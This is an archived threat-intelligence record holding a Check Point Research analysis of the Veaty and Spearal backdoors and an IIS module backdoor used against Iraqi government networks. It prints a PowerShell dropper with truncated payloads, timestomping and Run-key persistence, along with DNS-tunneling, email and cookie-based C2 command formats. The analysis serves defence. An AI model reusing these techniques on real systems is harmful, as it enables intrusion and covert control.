{
	"id": "a57f36c4-2bf5-45f7-bcc3-f1111cbc2aff",
	"created_at": "2026-04-06T00:06:09.46496Z",
	"updated_at": "2026-04-10T13:12:55.347813Z",
	"deleted_at": null,
	"sha1_hash": "9174480b3e9b7e867632197ace06f49012d4dd82",
	"title": "Targeted Iranian Attacks Against Iraqi Government Infrastructure - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126686,
	"plain_text": "Targeted Iranian Attacks Against Iraqi Government Infrastructure\r\n- Check Point Research\r\nBy stcpresearch\r\nPublished: 2024-09-11 · Archived: 2026-04-05 16:33:47 UTC\r\nKey Findings\r\nCheck Point Research discovered a new set of malware called Veaty and Spearal that was used in attacks against different Iraqi entities, including government networks.\r\nThe malware samples described in this report use a variety of techniques, including a passive IIS backdoor, DNS tunneling, and C2 communication via compromised email accounts.\r\nThe passive IIS backdoor appears to be a newer variant of the backdoor reported by ESET as employed by IIS Group 2 (also attributed by Symantec to GreenBug aka APT34).\r\nThe malware has multiple ties to previously described APT34 malware families such as Karkoff, Saitama, and IIS Group 2 operating in the same region. Those malware families are affiliated with the Iranian Ministry of Intelligence and Security (MOIS).\r\nIntroduction\r\nCheck Point Research (CPR) has been closely monitoring a campaign targeting the Iraqi government over the past few months. This campaign features a custom toolset and infrastructure for specific targets and uses a combination of techniques commonly associated with Iranian threat actors operating in the region.\r\nThe toolset used in this targeted campaign employs unique Command and Control (C2) mechanisms, including a custom DNS tunneling protocol and a tailor-made email-based C2 channel. The C2 channel uses compromised email accounts within the targeted organization, indicating that the threat actor successfully infiltrated the victim’s networks.\r\nUsing such distinctive C2 mechanisms, along with other attack-related artifacts such as malicious IIS modules, suggests possible connections to APT34, an Iranian MOIS-affiliated group. The malware families and methodology employed overlap with the Karkoff, Saitama, and IIS Group 2 clusters, all of which have ties to APT34.\r\nInitial Infection\r\nThe initial infection for the newly discovered campaign is kicked off by a series of files that use double extensions to masquerade as document attachments. Examples of the file names include Avamer.pdf.exe, Protocol.pdf.exe, and IraqiDoc.docx.rar. We also observed an infection that starts with an installer called ncms_demo.msi. All these files were uploaded to VirusTotal (VT) from Iraq in the months of March-May 2024. The initial infection likely started from some type of social engineering.\r\nFigure 1 – The installer used to deploy the Spearal malware bears the logo of the Iraqi General Secretariat of the Council of Ministers.\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 1 of 13\r\nThese files triggered the execution of PowerShell or PyInstaller scripts which dropped two additional files: the malware executable (EXE) file and its corresponding configuration. Notably, the scripts manipulated file write and access times, and added entries to the Windows registry under \\CurrentVersion\\Run for persistence. An example of the PowerShell script used to deploy the next stage:\r\n$a1=\"TVqQA[truncated]\";\r\n$a2=\"PD94b[truncated]\";\r\n$ex_dir=\"c:\\ProgramData\\System Documents\";\r\nmkdir $ex_dir;\r\n$ex_path=$ex_dir+\"\\FortiClients.exe\";\r\n$con_path=$ex_dir+\"\\FortiClients.exe.config\";\r\n$ex_decoded=[System.Convert]::FromBase64String($a1);\r\n$conf_decoded=[System.Convert]::FromBase64String($a2);\r\n[IO.File]::WriteAllBytes($ex_path,$ex_decoded)\r\n[IO.File]::WriteAllBytes($con_path,$conf_decoded)\r\n$ex_item=Get-Item $ex_path;\r\n$ex_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\n$ex_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$con_item=Get-Item $con_path;\r\n$con_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\n$con_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$dir_item=Get-Item $ex_dir;\r\n$dir_item.LastAccessTime=\"01/08/2022 06:11:47\";\r\n$dir_item.LastWriteTime=\"01/08/2022 06:11:47\";\r\n[System.Diagnostics.Process]::Start($ex_path);\r\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Forti Startup\" -Value $ex_path;\r\nThe next stage introduces one of two new malware families, Veaty or Spearal, and their configurations. Both configuration files are structured as XML files with base64-encoded keys and values.\r\nFigure 2 – Spearal Config (decoded).\r\nSpearal backdoor\r\nThe Spearal malware is a .NET backdoor that utilizes DNS tunneling for communication. The Command and Control (C2) server is stored as srvip in the configuration file, and the malware sends TXT queries to this server.\r\nThe data transferred between the malware and the C2 server is encoded in the subdomains of DNS queries using a custom Base32 scheme. The domain used is either specified in the malware’s configuration domn field or defaults to iqwebservice[.]com.\r\nFigure 3 – The infection chain installing the Spearal malware.\r\nThe queries sent by the Spearal malware are detailed below, illustrating how data is transmitted to and from the C2 server.\r\n1. Initial Authentication:\r\nQuery: base32encode(\"auth:;\u003cusername\u003e\")\r\nResponse: “stc:;base32encode(\u003ctarget_comm_id\u003e)” – This provides the target_comm_id, which is the victim identifier used in subsequent messages.\r\n2. Requesting Commands:\r\nQuery: base32encode(\"cmd:;\u003ctarget_comm_id\u003e\")\r\nResponse: Contains one of these commands to execute.\r\nCommand | Description\r\ncmd:;:; | Executes a PowerShell command.\r\ndl:;:; | Reads a file and sends its base32-encoded data.\r\nup:;:; | Retrieves content from the C2 to write to a file.\r\n3. Sending Command Results:\r\nFirst Message (Command Result Start message):\r\nQuery: base32encode(\"crs:;\u003ccmd_id\u003e:;\u003cnum of chunks\u003e\") – The maximum length for a chunk is based on the value chunk_len in the configuration (the default value is 30).\r\nResponse: “ok”.\r\nBody Messages (Command Result Body message):\r\nQuery: base32encode(\"crb:;\u003ccmd_id\u003e:;\u003cchunk_index\u003e:;\u003cchunk_value\u003e\").\r\nResponse (Result OK message): “rok:;\u003ccmd_id\u003e:;\u003cchunk_index\u003e” or “end”.\r\nEnd Results (Command Result End message):\r\nQuery: base32encode(\"cre:;\u003ccmd_id\u003e\").\r\nVeaty backdoor\r\nFigure 4 – The infection chain installing Veaty malware.\r\nVeaty is a .NET backdoor that utilizes emails for C2 communications. It can upload and download files and execute commands. In the sample we analyzed, the malware leverages compromised email accounts at the gov-iq.net domain to execute its commands.\r\nThe infection begins by disabling certificate verification, the process that checks whether an SSL/TLS certificate is valid and trusted when establishing a secure connection to a server. This allows the malware to communicate with the Exchange server (its C2) without being detected by certificate-based security measures.\r\nThe malware uses information from its configuration file in various aspects of communication with its C2 server:\r\nFigure 5 – Veaty Configuration (decoded).\r\nCommunication Channel Initialization\r\nThe malware determines which server to use and how to communicate with the server based on different hardcoded values. The malware has 4 flags (listed below) and attempts to communicate using each flag with a value of “True” until the communication with the Exchange server succeeds. The flags are used in the order in which they appear.\r\n1. try_defaultcred – Tries to communicate without a username and password. The malware tries to communicate with each domain in the following order:\r\n   1. the internal_domain field from the configuration file\r\n   2. the external_domain field from the configuration file\r\n   3. the Exchange server in the path on the compromised machine (https:///EWS/exchange.asmx)\r\n2. try_hardcodedCreds – Uses the same list of servers, but the malware tries to communicate using credential values (username and password) from the “creds” key in the config file.\r\n3. try_externalCreds – Tries to communicate using values from the “external_creds” key in the config file. The C2 server is based on a hardcoded value named mail_domain_external_known, which in our sample is equal to “mail.miicrosoft.com”.\r\n4. try_trustedNetwork – Tries to communicate using values from the “trusted_networks_creds” key in the config file. The C2 server address is taken from a hardcoded value named mail_domain_external_trusted, which in our case is also equal to “mail.miicrosoft.com”.\r\nCommand and Control Communication\r\nVeaty uses targeted mailboxes as its means of C2 communication. To prepare those mailboxes as C2 servers, it initializes a new rule so all its commands and responses will be moved to a relevant folder. Veaty has 3 values it uses to organize those emails:\r\n1. communicationFolder\r\n2. receive_sign\r\n3. placeForSignature – The value can be “subject”, “body” or “subjectorbody”.\r\nThe malware uses these values to search for a rule containing the receive_sign string in the placeForSignature field, with the target folder specified by the communicationFolder value. In this specific instance, it checks if there is a rule that searches for emails with the string “PMO” in the subject field and moves them to the deletedItems folder.\r\nIf the rule doesn’t exist, the malware adds a new rule with these parameters. The rule’s name is taken from the inboxRuleName hardcoded field, which in our case is “MicosoftDefaultRules”. As a result, any email with the predefined string in the subject will be moved to the deletedItems folder. This setup lets the attackers use those mailboxes as C2 channels while reducing the chance of being discovered by the account holder.\r\nVeaty has two types of messages: Alive messages, otherwise referred to as “HeartBeat” messages, and Command messages.\r\nAlive messages are dispatched as emails in the following format:\r\nSubject: alive_msg_subj hardcoded value\r\nBody: “alive_msg_body” + “ ID: ” + base64(\u003cComputerName\u003e:\u003cUserDnsDomain\u003e:\u003cUserName\u003e).\r\nThe recipient for Alive messages is based on the alive_mail value in the configuration file, and the message is sent at intervals (in minutes) corresponding to the value of al_time from the configuration file.\r\nFigure 6 – Example of an Alive message.\r\nCommand messages that match the rule established by the malware described above are searched for in the C2 mailbox. The command itself can be in the “attachment” (which was used in this specific campaign) or “body” of the mail, based on the hardcoded value ItemPlace. The commands are AES-encrypted with the enc_key value from the configuration file and base64-encoded. The commands are in the following format: \u003ccommand_id\u003e;\u003ccommand\u003e.\r\nCommand types:\r\nDownload File – Commands that begin with the value “this is my file content” hardcoded in the malware. The malware gets a file path and base64-encoded content to write to the file, with content segments separated by ‘’.\r\nUpload File – Commands that begin with the value “this is my required file path” hardcoded in the file. In this case, the malware gets a file path to read from and sends back its base64-encoded content to the C2.\r\nExecute command – All other commands are executed directly using PowerShell.\r\nThe results are sent to the sender of the command mail and encrypted similarly. The format of the results email is also based on the ItemPlace and placeForSignature values:\r\nHardcoded values | Subject | Body | Attachment\r\nItemPlace = “attachment”, placeForSignature = “subject” | send_sign value from the configuration file (in our case “Email”). | “Hey There! find your results in the attachment” (hardcoded value). | Encrypted data with the filename “smile.txt” (hardcoded value).\r\nItemPlace = “attachment”, placeForSignature = “body” | “Hey There! find your results in the attachment” (hardcoded value). | send_sign value from the configuration file (in our case “Email”). | Encrypted data with the filename “smile.txt” (hardcoded value).\r\nItemPlace = “body”, placeForSignature = “subject” | send_sign value from the configuration file (in our case “Email”). | Encrypted data as the body of the email. | –\r\nThe malware also contains several functions and variables it doesn’t use, which might indicate that it is based on different code and that the authors left in some extraneous data.\r\nSSH malware\r\nAnalysis of the threat actors’ infrastructure led to the discovery of a similarly formed XML config file, likely used by a third backdoor to facilitate SSH tunneling. The IP address mentioned in the configs, 37.1.213[.]152, is associated with the domain mofaiq[.]com, pointing to the same targeting of Iraqi government entities.\r\nFigure 7 – SSH tunneling malware config file.\r\nAttribution\r\nThe Veaty and Spearal Tactics, Techniques and Procedures (TTPs) are very similar to those of two other malware families, Karkoff and Saitama, which are attributed to the same APT34 actor.\r\nTTP and code overlaps:\r\nVeaty malware uses techniques and variable names similar to those previously used by Karkoff malware. Both malware families use email tunneling in the same way: searching for emails with a pre-configured subject (Dropbox in Karkoff, PMO in Veaty), extracting from these emails commands to execute, and then deleting the email. The implementation of these methods is also similar.\r\nThe Karkoff malware communicated through compromised email addresses belonging to Lebanese government entities, similar to Veaty, which used compromised mail accounts of Iraqi government entities.\r\nSpearal malware uses techniques that resemble the ones used by Saitama malware: they both use base32-encoded commands passed through DNS tunneling. Saitama was used in an attack that targeted Jordanian government entities.\r\nasiacall.net, a C2 domain associated with this campaign, bears similarities to the domain name conventions used by Saitama malware.\r\nUsing similar tools, techniques, and infrastructure against targets from the same geographical region leads us to conclude that this operation is carried out by an actor with a similar nexus to those who carried out previous Karkoff and Saitama attacks.\r\nHTTP-Based backdoors\r\nWhile investigating the previously mentioned samples, we encountered an intriguing IIS module backdoor named CacheHttp.dll that likely targeted the same organizations in Iraq. This module represents a newer iteration of malware that was previously attributed to IIS Group 2 and GreenBug.\r\nThe backdoor listens for OnGlobalPreBeginRequest events within the IIS server and executes its main functionality when these events occur.\r\nThe execution process begins by checking if the Cookie header is present in incoming HTTP requests and reads it until the ; sign. The main parameter is F=0/1, which indicates whether the backdoor initializes its command configuration (F=1) or runs the commands based on this configuration (F=0).\r\nIf F=1, the configuration parameters are included in the Cookie header after the , character as a series of key-value pairs in the following format: Cookie: F=1,a=[u/d/r/r2/r3]\u0026b=[Shell_Command]\u0026k=[Session_Key]\u0026f=[File]\r\nThere are four keys:\r\na : Specifies the action (u, d, r, r2, or r3) discussed below.\r\nb : Encrypted shell command.\r\nk : Session Key encrypted with an RSA Private Key.\r\nf : Encrypted filename for download.\r\nSupported commands:\r\nCommand | Description | Parameters | Return Value\r\nu | Write content to a file. | ‘f’ – filename, ‘b’ – data to write | The string ‘OK’ encrypted.\r\nd | Read data from a file. | ‘f’ – filename | base64-encoded and encrypted data of the file.\r\nr | Run command using popen. | ‘b’ – command | Encrypted result of the command.\r\nr2 | Run command using CreateProcessW into a pipe and read from it. | ‘b’ – command | Encrypted result of the command.\r\nr3 | Create a pipe named \"\\\\.\\pipe\\iis\" and write/read data from there. | ‘b’ – command | Encrypted result of the data read from the pipe.\r\nThe ‘b’ and ‘f’ values are encrypted with AES-CBC using the ‘k’ value and base64-encoded. The ‘k’ value is encrypted with an RSA private key that the attacker possesses, and the public key for this RSA private key is hardcoded inside the file.\r\nThe communication from the IIS backdoor to the C2 is encrypted in a similar way. A random AES-CBC key is generated and used to encrypt the data. The key itself is then encrypted with a public RSA key hardcoded in the file, for which the attackers hold the private key, and then sent together with the data to the C2 server.\r\nEvolution from IIS Group 2 and RGDoor\r\nCacheHttp.dll represents an evolved version of the IIS Group 2 backdoor. While its core functionality remains similar, it introduces two additional methods for command execution: r2 and r3.\r\nNotably, the communication flow has undergone a significant change. Unlike the Group 2 variant, which communicates via the HTTP body, CacheHttp.dll now communicates through the Cookie field. This shift aligns with the communication technique observed in the older RGDoor, another IIS backdoor attributed to APT34. In RGDoor, the C2 communication format is:\r\nCookie: RGSESSIONID=\u003cEncrypted command\u003e\r\nAnother interesting sample, uploaded to VT from Pakistan in February 2023, represents a straightforward IIS backdoor with minimal functionality. Specifically, it offers four distinct methods to execute commands. Notably, this sample’s communication method shares similarities with CacheHttp. Commands are transmitted within the Cookie field in this format:\r\nCookie:_sessionsID=hex(value),c=?,t=?,p=[1/2/3/4]\r\nThe Pakistani sample utilizes four distinct methods for executing commands, suggesting a potential connection to CacheHttp, which employs three command execution methods (r, r2, r3). The code and implementation techniques show similarities between the two backdoors.\r\nFigure 9 – Comparison between the two code samples.\r\nIn addition, the close relationship between APT34 and Greenbug, and the overlapping TTPs and targets in the Middle East, suggest that all these tools, CacheHttp, IIS Group 2, and RGDoor, might be variants of the same tool.\r\nFigure 10 – Evolution of IIS backdoors from RGDoor to CacheHTTP.\r\nHTTP Listener – listner\r\nlistner is another passive backdoor uploaded to VT in the same context as the previously described malware. This tool is a basic .NET-based HTTP listener, registered to handle incoming HTTP requests to the URL https://[REDACTED].gov.iq/owa/auth/login. Incoming GET requests with the parameter snmflwkejrhgsey will execute its value via CMD, sending back the response in HTML format.\r\nFigure 11 – HTTP Listener Malware.\r\nDespite its simplicity, this malware once again highlights the threat actor’s inclination towards passive backdoors.\r\nConclusion\r\nThis campaign against Iraqi government infrastructure highlights the sustained and focused efforts of Iranian threat actors operating in the region. The custom toolset and dedicated infrastructure observed in this operation are similar to techniques commonly associated with APT34, an Iranian MOIS-affiliated threat actor.\r\nThe deployment of a custom DNS tunneling protocol and an email-based C2 channel leveraging compromised accounts highlights the deliberate effort by Iranian actors to develop and maintain specialized Command and Control mechanisms. This distinctive blend of straightforward tools, written in .NET, combined with sophisticated C2 infrastructure, is common among similar Iranian threat actors.\r\nThe discovery of the Veaty and Spearal malware families and the presence of a passive IIS backdoor align this campaign with previously identified activity clusters like Karkoff, Saitama, and IIS Group 2. These artifacts further solidify the link between this operation and APT34’s known tactics, techniques, and procedures.\r\nProtections:\r\nHarmony Endpoint\r\nAPT.Win.OilRig.F\r\nAPT.Win.OilRig.WA.G\r\nAPT.Win.OilRig.H\r\nThreat Emulation\r\nAPT.Wins.Oilrig.ta.B/C/D/E\r\nAB\r\nBackdoor.WIN32.CacheHttp.A/B/C\r\nBackdoor.WIN32.Spearal.A/B/C/D/E/F\r\nIOCs\r\nSource: https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/"
	],
	"report_names": [
		"iranian-malware-attacks-iraqi-government"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed",
			"created_at": "2022-10-25T16:07:23.918534Z",
			"updated_at": "2026-04-10T02:00:04.789509Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [
				"Greenbug",
				"Volatile Kitten"
			],
			"source_name": "ETDA:Greenbug",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "25896473-161f-411f-b76a-f11bb26c96bd",
			"created_at": "2023-01-06T13:46:38.75749Z",
			"updated_at": "2026-04-10T02:00:03.090307Z",
			"deleted_at": null,
			"main_name": "CHRYSENE",
			"aliases": [
				"Greenbug"
			],
			"source_name": "MISPGALAXY:CHRYSENE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bba8e81-73af-4010-86dc-d43c408ca342",
			"created_at": "2023-01-06T13:46:38.553459Z",
			"updated_at": "2026-04-10T02:00:03.021597Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [],
			"source_name": "MISPGALAXY:Greenbug",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433969,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9174480b3e9b7e867632197ace06f49012d4dd82.pdf",
		"text": "https://archive.orkl.eu/9174480b3e9b7e867632197ace06f49012d4dd82.txt",
		"img": "https://archive.orkl.eu/9174480b3e9b7e867632197ace06f49012d4dd82.jpg"
	}
}